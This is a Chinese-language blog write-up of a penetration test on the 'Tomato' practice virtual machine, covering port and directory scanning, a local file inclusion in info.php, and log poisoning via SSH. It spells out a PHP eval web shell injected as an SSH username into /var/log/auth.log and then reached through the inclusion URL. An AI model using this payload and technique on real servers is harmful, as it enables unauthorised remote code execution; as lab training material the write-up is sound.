首页 > 其他分享 >tomato-靶机渗透

tomato-靶机渗透

时间:2024-07-29 19:55:01浏览次数:16  
标签:tomato log 渗透 image 192.168 var antibot 靶机 30.130

tomato-靶机

一、安装靶机环境

下载双击.ova文件,写文件名路径导入

image-20240729163951152
打开虚拟机用NAT模式

image-20240729164230107

编辑–>虚拟网络编辑器查看IP段

image-20240729164258715

二、信息收集

1.御剑端口扫描查找该虚拟机的IP

image-20240729164847351

访问网站

image-20240729164853240

扫目录

dirb http://192.168.30.130 

image-20240729184105795

收集到目录

/server-status
/antibot_image/
/index.html

访问/antibot_image目录

image-20240729184513313

在目录下找到info.php

image-20240729184632414

查到

根目录:/var/www/html
用户名:webmaster@localhost

查看info.php源代码,提示image参数用于文件包含

image-20240729190126839

三、漏洞渗透

写image参数=linux的系统文件,发现成功显示,确定有文件包含漏洞

image-20240729190309073

2.发现端口没有全部扫描出来,使用这个命令扫描

nmap -A 192.168.30.130 -p-

image-20240729191712482

2211是ssl的连接端口

ssh '<?php @eval($_POST['cmd']);?>'@192.168.30.130 -p 2211

image-20240729193416587

然后在网页端查看ubuntu报错信息:/var/log/auth.log

http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

image-20240729193644266

看到注入成功,然后用蚁剑

URL地址

http://192.168.30.130/antibot_image/antibots/info.php?image=/var/log/auth.log

image-20240729193444317

然后就可以控制整个文件

标签:tomato,log,渗透,image,192.168,var,antibot,靶机,30.130
From: https://blog.csdn.net/weixin_53736204/article/details/140779446

相关文章

  • hackme-1靶机
    目录扫描发现该网址存放上传文件注册一个账户,点击搜索验证是否存在sql注入漏洞WindowsOS'and1=1#WindowsOS'and1=2#存在sql注入漏洞 判断列数WindowsOS'orderby3#WindowsOS'orderby4#所以,有3列;判断回显位置-1'unionselect1,2,3#查看当......
  • 【Vulnhub系列】Vulnhub_SecureCode1靶场渗透(原创)
    【Vulnhub系列靶场】Vulnhub_SecureCode1靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、环境配置1、从百度网盘下载对应靶机的.ova镜像2、在VM中选择【打开】该.ova3、选择存储路径,并打开4、之后确认网络连接模式是......
  • 【Vulnhub系列】Vulnhub_DC-1靶场渗透(原创)
    【Vulnhub系列靶场】Vulnhub_DC-1靶场渗透原文转载已经过授权原文链接:Lusen的小窝-学无止尽,不进则退(lusensec.github.io)一、环境准备1、在百度网盘中下载DC-1靶场。DC-1靶场受virtualbox的影响,在VM中直接打开是扫描不到IP的,我们需要先解决这个问题:【其他经验】V......
  • uiautomator2启动weditor时报AttributeError: ‘Device‘ object has no attribute ‘
    一。当前安装的环境1.不知道有人在安装使用uiautomator2时有没有遇到过这个情况,安装最新版uiautomator2,版本version==3.1.1,weditor版本version==0.6.4,之后安装的atx的版本version==2.4.0,安装之后,atx界面就成这样了:这个界面少了很多东西,启动服务的开关也没有了。我尝试过回退U2的......
  • Tomato靶机
    Tomato靶机对通网段进行主机发现:分别进行目录扫描:进行访问:发现有弹窗尝试抓包,发现没有任何参数,也不能进行爆破查找资料发现8080端口存在可访问的目录,一个一个点进去发现phpinfo文件查看源码有文件包含漏洞,且参数为flie尝试访问etc/passwd对此ip进行全端口扫描......
  • DC-2靶机详解
    DC-2信息搜集IP探测netdiscover-r192.168.179.0/24得到ip为192.168.179.133。端口探测先看开放了哪些端口。nmap-sT--min-rate10000-p-192.168.179.133有个7744不知道什么玩意儿。nmap两步走(udp不用扫了,没攻击思路了再说),详细端口扫描nmap-sT-sV......
  • DC系列靶场---DC 3靶场的渗透测试(一)
    信息收集Nmap扫描nmap-sS-sV-T4-p--O172.30.1.142//-sSTCP的SYN扫描//-sV服务版本检测//-T4野蛮的扫描(常用)//-O识别操作系统使用Nmap扫描只看到一个80端口,Apache的2.4.18版本。http探测使用Wappalyzer插件可以到这是Joomla的CMS。Joomla!是一套全球......
  • Metasploit Pro 4.22.2-2024071901 (Linux, Windows) - 专业渗透测试框架
    MetasploitPro4.22.2-2024071901(Linux,Windows)-专业渗透测试框架Rapid7Penetrationtesting,releaseJul19,2024请访问原文链接:https://sysin.org/blog/metasploit-pro-4/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org世界上最广泛使用的渗透测试框架......
  • WEB渗透信息收集篇--网站架构和指纹识别
     往期文章WEB渗透信息收集篇--域名信息-CSDN博客WEB渗透信息收集篇--IP和端口信息-CSDN博客WEB渗透信息收集篇--其他信息-CSDN博客WEB渗透信息收集篇--人员信息-CSDN博客信息泄露电话、邮箱,姓名若是论坛ID=1的用户名一般为管理、或查看帖子信息、生成字典网页上客服的......
  • 关于kali扫描不到靶机的解决方法
    关于kali扫描不到靶机的解决方法前情提要这里使用的都是VMware,因为Vulnhub的靶场都是适配于VirtualBox,因此在使用VMware开启Vulnhub的靶场的时候,靶机大概率会出现获取不到IP地址的情况,因此我们需要修改一些配置,来使得靶机可以获取IP地址。前提在开始之前我们首先要确保攻击......